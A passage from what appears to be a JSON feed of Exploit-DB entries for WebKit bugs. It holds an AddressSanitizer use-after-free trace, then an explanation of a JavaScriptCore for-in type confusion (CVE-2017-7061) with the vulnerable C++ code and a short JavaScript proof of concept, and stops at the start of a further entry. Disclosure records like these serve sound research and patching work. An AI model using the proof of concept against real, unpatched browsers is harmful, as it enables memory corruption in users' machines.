(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)\r\n #24 0x115a87757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)\r\n #25 0x115a093da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)\r\n #26 0x1150410f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)\r\n #27 0x115041362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)\r\n #28 0x1150416d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)\r\n #29 0x10b0faa15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)\r\n #30 0x10b48e510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)\r\n #31 0x10a88f68e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e)\r\n #32 0x10a88f170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170)\r\n #33 0x10a76a041 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x863041)\r\n #34 0x10a779aaf in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x872aaf)\r\n #35 0x10a67b7af in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7747af)\r\n #36 0x10a676103 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f103)\r\n #37 0x10aa1b9ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)\r\n #38 0x10aa18d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)\r\n #39 0x10a694493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)\r\n #40 0x10ac085c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)\r\n #41 0x10a733093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)\r\n #42 0x10a6f2386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #43 0x10a181997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #44 0x10a17b2aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #45 0x10cb02c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #46 0x10260c2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #47 0x10260f689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #48 0x10260eba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #49 0x101eaf683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #50 0x101c593b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #51 0x101c62888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n #52 0x1164b5312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)\r\n #53 0x1164b5d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)\r\n #54 0x7fff8da4f3c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)\r\n #55 0x7fff8da302cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)\r\n #56 0x7fff8da2f7c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)\r\n #57 0x7fff8da2f1c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)\r\n #58 0x7fff8cf90ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)\r\n #59 0x7fff8cf90cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)\r\n #60 0x7fff8cf90b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\r\n #61 0x7fff8b52be23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)\r\n #62 0x7fff8bca785d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)\r\n #63 0x7fff8b5207aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)\r\n #64 0x7fff8b4eb1dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)\r\n #65 0x7fffa33eb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)\r\n #66 0x7fffa33ea2e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)\r\n #67 0x101b7156c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)\r\n #68 0x7fffa3192234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)\r\n\r\n0x6080000908a0 is located 0 bytes inside of 88-byte region [0x6080000908a0,0x6080000908f8)\r\nfreed by thread T0 here:\r\n #0 0x104b54294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)\r\n #1 0x1164fcf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)\r\n #2 0x10a0e1fda in WebCore::AXObjectCache::remove(unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dafda)\r\n #3 0x10a0e576e in WebCore::AXObjectCache::remove(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1de76e)\r\n #4 0x10c573c0b in WebCore::RenderObject::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266cc0b)\r\n #5 0x10c681ac3 in WebCore::RenderText::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x277aac3)\r\n #6 0x10c57412f in WebCore::RenderObject::destroy() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266d12f)\r\n #7 0x10c6d35ba in WebCore::RenderTreeUpdater::tearDownRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc5ba)\r\n #8 0x10c6d22a8 in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cb2a8)\r\n #9 0x10c6d11de in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca1de)\r\n #10 0x10c6d0c4d in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9c4d)\r\n #11 0x10c6d047b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)\r\n #12 0x10a6757e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)\r\n #13 0x10a670185 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x769185)\r\n #14 0x10a6767b2 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2)\r\n #15 0x10ccec7c6 in WebCore::TextIterator::TextIterator(WebCore::Range const*, unsigned short) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2de57c6)\r\n #16 0x10ccf8b2f in WebCore::plainText(WebCore::Range const*, unsigned short, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2df1b2f)\r\n #17 0x109f5820d in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5120d)\r\n #18 0x109f2c9e2 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x259e2)\r\n #19 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)\r\n #20 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)\r\n #21 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)\r\n #22 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)\r\n #23 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)\r\n #24 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)\r\n #25 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)\r\n #26 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)\r\n #27 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)\r\n #28 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)\r\n #29 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)\r\n\r\npreviously allocated by thread T0 here:\r\n #0 0x104b53d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)\r\n #1 0x7fffa3314281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)\r\n #2 0x116506ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)\r\n #3 0x1164fbc4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)\r\n #4 0x116491437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)\r\n #5 0x116490768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)\r\n #6 0x109f09a08 in WTF::RefCounted<WebCore::AccessibilityObject>::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a08)\r\n #7 0x109f55ef9 in WebCore::AccessibilityRenderObject::create(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4eef9)\r\n #8 0x10a0e3e5d in WebCore::createFromRenderer(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dce5d)\r\n #9 0x10a0e2c59 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbc59)\r\n #10 0x109f2c7c3 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x257c3)\r\n #11 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)\r\n #12 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)\r\n #13 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)\r\n #14 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)\r\n #15 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)\r\n #16 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)\r\n #17 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)\r\n #18 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)\r\n #19 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)\r\n #20 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)\r\n #21 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)\r\n #22 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)\r\n #23 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)\r\n #24 0x10a82607c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)\r\n #25 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)\r\n #26 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)\r\n #27 0x10b463b93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)\r\n #28 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)\r\n #29 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4) in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const\r\nShadow bytes around the buggy address:\r\n 0x1c10000120c0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c10000120d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c10000120e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c10000120f0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa\r\n 0x1c1000012100: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd\r\n=>0x1c1000012110: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fa\r\n 0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012140: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012150: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==728==ABORTING\r\n-->\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42360/"}, {"lastseen": "2017-09-12T22:52:25", "description": "WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization. CVE-2017-7061. Dos exploit for Multiple platform", "published": "2017-09-12T00:00:00", "type": "exploitdb", "title": "WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7061"], "modified": "2017-09-12T00:00:00", "id": "EDB-ID:42666", "href": "https://www.exploit-db.com/exploits/42666/", "sourceData": "Let's start with JS code.\r\n\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n o[i]; <<-------- (a)\r\n}\r\n\r\nWhen the code generator meets (a), it will call BytecodeGenerator::emitGetByVal.\r\n\r\nHere's the code of BytecodeGenerator::emitGetByVal.\r\n\r\nRegisterID* BytecodeGenerator::emitGetByVal(RegisterID* dst, RegisterID* base, RegisterID* property)\r\n{\r\n for (size_t i = m_forInContextStack.size(); i > 0; i--) {\r\n ForInContext& context = m_forInContextStack[i - 1].get();\r\n if (context.local() != property)\r\n continue;\r\n\r\n if (!context.isValid())\r\n break;\r\n\r\n if (context.type() == ForInContext::IndexedForInContextType) {\r\n property = static_cast<IndexedForInContext&>(context).index();\r\n break;\r\n }\r\n\r\n ASSERT(context.type() == ForInContext::StructureForInContextType);\r\n StructureForInContext& structureContext = static_cast<StructureForInContext&>(context);\r\n UnlinkedValueProfile profile = emitProfiledOpcode(op_get_direct_pname);\r\n instructions().append(kill(dst));\r\n instructions().append(base->index());\r\n instructions().append(property->index());\r\n instructions().append(structureContext.index()->index());\r\n instructions().append(structureContext.enumerator()->index());\r\n instructions().append(profile);\r\n return dst;\r\n }\r\n\r\n UnlinkedArrayProfile arrayProfile = newArrayProfile();\r\n UnlinkedValueProfile profile = emitProfiledOpcode(op_get_by_val);\r\n instructions().append(kill(dst));\r\n instructions().append(base->index());\r\n instructions().append(property->index());\r\n instructions().append(arrayProfile);\r\n instructions().append(profile);\r\n return dst;\r\n}\r\n\r\nThe method uses op_get_by_val to handle expressions like \"o[i]\". But, there is a fast path, which uses op_get_direct_pname, for when the index variable is a string. op_get_direct_pname is designed for a string index only. So if other types are used as indexes, it will cause type confusions. In the above JS code, it's very clear that \"i\" will be a string(\"xx\") semantically. Therefore, it will use op_get_direct_pname to handle it.\r\n\r\nHere's another example.\r\n\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n o[i]; <<-------- (a)\r\n i = 0x123456; <<-------- (b)\r\n o[i]; <<-------- (c)\r\n}\r\n\r\nIn this case, it will use op_get_direct_pname at (a). And at (b), since the index variable \"i\" is replaced, the invalidate method of the ForInContext object that makes \"context.isValid()\" return false is called. So, op_get_by_val will be used at (c).\r\n\r\nBut the problem is that it can't properly handle the following case which cause a type confusion.\r\n\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n for (let j = 0; j < 2; j++) {\r\n o[i]; // When j == 1, op_get_direct_pname was already emitted, but i is not a string anymore.\r\n i = 0;\r\n }\r\n}\r\n\r\nPoC:\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n for (let j = 0; j < 2; j++) {\r\n o[i];\r\n i = new Uint32Array([0, 1, 0x777777, 0, 0]);\r\n }\r\n}\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42666/"}, {"lastseen": "2017-07-25T21:42:24", "description": "WebKit JSC - 'JSArray::appendMemcpy' Uninitialized Memory Copy. CVE-2017-7064. Dos exploit for Multiple platform", "published": "2017-07-25T00:00:00", "type": "exploitdb", "title": "WebKit JSC - 'JSArray::appendMemcpy' Uninitialized Memory Copy", "bulletinFamily": 